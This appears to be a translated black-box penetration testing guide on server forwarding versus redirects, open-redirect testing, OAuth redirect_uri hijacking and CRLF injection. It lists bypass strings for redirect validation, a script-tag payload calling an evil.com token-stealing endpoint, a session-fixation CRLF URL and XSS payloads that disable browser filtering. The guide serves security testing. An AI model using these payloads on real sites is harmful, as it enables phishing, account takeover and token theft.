- forward(forward)
It is a jump on the server side. When a request is sent from the client to the server, the server directly passes the information of parameters related to the request to other jsp or servlets on the server for processing.
- send redirect (redirect)
It is a jump on the client side. The server will return a response header and a new url address to the client. The original parameters and other information will no longer exist if the server does not deal with it specifically. The browser will access the servlet or jsp pointed to by the new url. This may not be the original webservice on the server.
- Comparison of redirection and forwarding
Forwarding is done on the server side, and redirection is done on the client side
Fast forwarding speed, slow redirection speed
The same request is forwarded, and the redirection is two different requests
Forwards do not execute the forwarded code, and redirects execute the redirected code
There is no change in the forwarding address bar, but there is a change in the redirection address bar
Forwarding must be done on the same server, and redirection can be done on different servers
I. attack scenarios
- Unsafe jump
Many application systems have a jump function, which often appears on the login page. If you have not yet logged in, you will jump to the login page. If the verification is successful, you will jump to the main page of the system. Another one often occurs when jumping to a customized error page when an exception occurs in the system. If these redirected urls can be arbitrarily modified and the entire url is sent to the victim, a phishing attack may exist.
- test method
First find all existing jump URLs. Finding method: Use the proxy tool burpsuite to record all requests and responses and then search for keywords such as redirect,service, etc. from the recorded requests and responses to find the url with a jump.
The URL link is generally 127.0.0.1/test/test.jsp? service=http://xxx.com
Change the URL behind the service to any URL, such as www.bcbccb.cn. If you can jump to this URL, it means that there is a loophole. Some system restrictions think that it will be fine if it is limited to the same local area network. In fact, this cannot rule out that attackers build a phishing server on the intranet to attack, so if possible, try to set a white list to only restrict jumping to certain URLs.
- Method to bypass URL jump
If the product has been partially verified, it may not be possible to directly replace the URL. At this time, you can consider bypassing the verification and making illegal jumps.
Example of bypassing scenarios:
http://www.bcbccb.cn and http://127.0.0.1 are the same request
115.239.210.26 IP conversion bypass with 16373751032
Use other redirection vulnerabilities in the same domain in combination:
http://www.test.com/a? url=http://www.test.com/b? url=bcbccb.cn
- test method
- Use backend and browser to resolve host differences
Different browser kernels have different resolved hosts for the same URL. Taking advantage of this feature, special URLs can be constructed to achieve the purpose of bypassing.
For example:
There is a URL as follows:
url=http://www.bcbccb.cn\test.com/index.php
Backend: host= test.com
Use different browsers, and the parsed host is shown in the following table. Use a browser that can parse bcbccb.cnto access it to get the effect of jumping to bcbccb.cn.
- URL redirection in OAuth2.0
OAuth is an open standard that allows users to authorize third-party websites to access information they store on another service provider without having to provide usernames and passwords to third-party websites or share all of their data.
According to OAuth's authentication process, the user authorization certificate will be forwarded by the server to the address corresponding to redirect_uri. If an attacker forges redirect_uri as his address and then induces the user to send the request, the obtained certificate will be sent to the attacker's forged callback address. The attacker can use the certificate to log in to the user account, causing authorization hijacking.
- The authentication server did not verify redirect_uri and exited the main domain directly.
http://api.weibo.com/oauth2/authorize? client_id=123456&……redirect_uri=http://account.youku.com/partner_thirdLoginCallback/tlsite_weibo
http://api.weibo.com/oauth2/authorize? client_id=123456&……redirect_uri=http://www.bcbccb.cn
- Leverage host resolution differences between authentication server and browser to bypass authentication
For example:
redirect_uri=author.app.com.evil.com
Authentication server:
host=app.com
Browser:
host=evil.com
Examples:
auth.app.com.evil.com
evil.com? auth.app.com
evil.com?@ auth.app.com
auth.app.com\@evil.com
evil.com\auth.app.com
evil.com:\auth.app.com
evil.com\.auth.app.com
evil.com:\@auth.app.com
- Subdomain controllable
The primary domain is verified for the callback address, but its subdomains can be controlled.
http://api.weibo.com/oauth2/authorize? client_id=123456&……redirect_uri=https://account.sinaapp.com
http://api.weibo.com/oauth2/authorize? client_id=123456&……redirect_uri=https://evil.sinaapp.com
Cross-domain vulnerability
Combine the url redirection vulnerability or xss vulnerability in the trusted domain to steal tokens from the referer.
redirect_uri=http://auth.app.com/redirect.php? url=evil.com
redirect_uri=http://app.com/ajax/car.html? callback=<script src=”http://evil.com? getToken.php”></script>
- CRLF and URL redirection combination
CRLF is the abbreviation for carriage return + line feed (\r\n, )
URL redirection is usually specified through the Location in the response header. When no judgment is made on the jump parameter, it may lead to a CRLF Injection attack.
- Forcibly push a session to the user, causing a session fixation attack.
http://www.app.com/redirect? url=http://www.baidu.com/loginset-cookie:JSPSESSID=vulbox
- Insert malicious code into the Response body by inserting 2 CR and LF characters, creating a reflective XSS vulnerability
http://www.app.com/redirect? url=<IMG src=1 onerror=alert(/v587/>
- Browser Filter is a protection policy that the browser should make for reflective XSS. You can turn off this protection policy by setting a response header.
X-XSS-Protection=0
http://www.app.com/redirect? url=X-XSS-Protection=0<IMG src=1 onerror=alert(/v587/>
II. impact
This may lead to attackers using URLs to conduct phishing attacks and affect the company's reputation. On the one hand, since user input will enter Meta,javascript,http headers, vulnerability in response context may occur, such as xss, etc. However, at the same time, even the function of URL jumping itself has a flaw, because it will direct the user's browser from a trusted site to an untrusted site. At the same time, if sensitive data is included when jumping, sensitive data may be leaked to an untrusted third party. Forwarding and redirecting black box penetration testing guidance
English 
Chinese
Comments0